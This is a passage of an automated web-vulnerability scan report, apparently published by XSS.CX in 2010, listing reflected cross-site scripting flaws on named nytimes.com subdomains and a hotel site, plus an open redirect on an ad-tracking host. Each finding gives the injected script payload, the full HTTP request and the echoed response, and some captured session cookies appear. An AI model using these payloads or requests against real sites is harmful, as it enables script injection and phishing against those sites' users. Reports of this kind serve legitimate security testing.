Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 03:32:09 GMT
Content-type: text/html
Content-Length: 226181

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/11/12/world/1248069321921/timescast-november-12-2010.html?77337"><script>alert(1)</script>1a269a3367e=1">
...[SNIP]...

3.378. http://video.on.nytimes.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.on.nytimes.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4069"><script>alert(1)</script>6deaed5a6f3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?f4069"><script>alert(1)</script>6deaed5a6f3=1 HTTP/1.1
Host: video.on.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:21:01 GMT
Content-type: text/html
Content-Length: 233465

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.on.nytimes.com/?f4069"><script>alert(1)</script>6deaed5a6f3=1">
...[SNIP]...

3.379. http://homedelivery.nytimes.com/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://homedelivery.nytimes.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 40c3d'><script>alert(1)</script>d9610dce7e2 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: homedelivery.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=40c3d'><script>alert(1)</script>d9610dce7e2

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 13 Nov 2010 02:04:52 GMT
Content-type: text/html;charset=ISO-8859-1
Pragma: No-cache
Cache-control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-language: en
Set-cookie: JSESSIONID=00003UqU-wpicu9dplBkNJ5P8FS:12d2e99pd; Path=/
Connection: close
Content-Length: 29477


<html>
<head>


<link rel="stylesheet" href="css/HDStyles.css" type="text/css"/>
<link rel="stylesheet" type="text/css" href="css/global.css" />

</head>


<body>
<br/>
<tabl
...[SNIP]...
<a href='https://myaccount.nytimes.com/auth/hdlogin?URI=http://homedelivery.nytimes.com/HDS/HDSHome.do&OQ=modeQ3DHDSHomeQ26hlQ3DenQ26qQ3D40c3d'><script>alert(1)</script>d9610dce7e2&hd=1' onmouseover="this.style.textDecoration='underline';" onmouseout="this.style.textDecoration='none';" style="color:#004276; text-decoration: none; font-weight: bold;">
...[SNIP]...

3.380. http://ipboutiquehotel.com/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ipboutiquehotel.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab8f8"><script>alert(1)</script>fb840085aed was submitted in the Referer HTTP header. This input was echoed as ab8f8\"><script>alert(1)</script>fb840085aed in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: ipboutiquehotel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=ab8f8"><script>alert(1)</script>fb840085aed

Response

HTTP/1.1 200 OK
Date: Sat, 13 Nov 2010 02:05:11 GMT
Server: Microsoft-IIS/5.0
X-Powered-By: PHP/4.4.7
Set-Cookie: PHPSESSID=bce3a5b6be4e3c1815689ac7c999c536; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 9539


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=euc-kr" />
<title>::::: IP Boutique Hotel :::::</title>
<link href="./css/style_ip.css" rel="stylesheet" type="text/css" />

...[SNIP]...
<img src="http://www.ipboutiquehotel.com/log/nalogd.php?counter=cnt&url=http://www.google.com/search?hl=en&q=ab8f8\"><script>alert(1)</script>fb840085aed" width=0 height=0>
...[SNIP]...

4. Open redirection

Summary

Severity:   Low
Confidence:   Certain
Host:   http://50.xg4ken.com
Path:   /media/redir.php

Issue detail

The value of the url[] request parameter is used to perform an HTTP redirect. The payload http%3a//a63267a8e711960db/a%3fhttp%3a//www.perpetual.com.au/investors.aspx was submitted in the url[] parameter. This caused a redirection to the following URL (taken from the Location header of the response below):

http://a63267a8e711960db/a?http://www.perpetual.com.au/investors.aspx

Issue background

Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application which causes a redirection to an arbitrary external domain. This behaviour can be leveraged to facilitate phishing attacks against users of the application. The ability to use an authentic application URL, targeting the correct domain with a valid SSL certificate (if SSL is used), lends credibility to the phishing attack because many users, even if they verify these features, will not notice the subsequent redirection to a different domain.

Issue remediation

If possible, applications should avoid incorporating user-controllable data into redirection targets. In many cases, this behaviour can be avoided in two ways:

If it is considered unavoidable for the redirection function to receive user-controllable input and incorporate this into the redirection target, one of the following measures should be used to minimize the risk of redirection attacks:

Request

GET /media/redir.php?prof=593&camp=15226&affcode=cr5943&cid=6211890421&networkType=content&url[]=http%3a//a63267a8e711960db/a%3fhttp%3a//www.perpetual.com.au/investors.aspx HTTP/1.1
Host: 50.xg4ken.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://googleads.g.vulnerable.ad.partner/pagead/ads?client=ca-nytimes_topic_var&output=js&lmt=1289612644&num_ads=3&channel=null%20Times_Topics&ea=0&oe=utf8&flash=10.1.102.64&url=http%3A%2F%2Ftopics.nytimes.com%2Ftopics%2Freference%2Ftimestopics%2Findex.html%3Fsrc%3Dhp1-0-T&adsafe=high&dt=1289612644699&shv=r20101104&jsv=r20101102&prev_fmts=728x90_pas_abgc&correlator=1289612638818&frm=0&adk=3911298567&ga_vid=450131239.1289612641&ga_sid=1289612641&ga_hid=1125200407&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=960&u_w=1536&u_ah=925&u_aw=1536&u_cd=16&u_nplug=0&u_nmime=0&biw=985&bih=645&eid=30143102&ref=http%3A%2F%2Fwww.nytimes.com%2F&fu=0&ifi=3&dtd=63

Response

HTTP/1.1 302 Found
Date: Sat, 13 Nov 2010 01:48:14 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Set-Cookie: kenshoo_id=0742c4e3-7054-6129-5b91-0000644fa2b4; expires=Fri, 11-Feb-2011 01:48:14 GMT; path=/; domain=.xg4ken.com
Location: http://a63267a8e711960db/a?http://www.perpetual.com.au/investors.aspx
P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Report generated by XSS.CX at Fri Nov 12 22:21:15 CST 2010.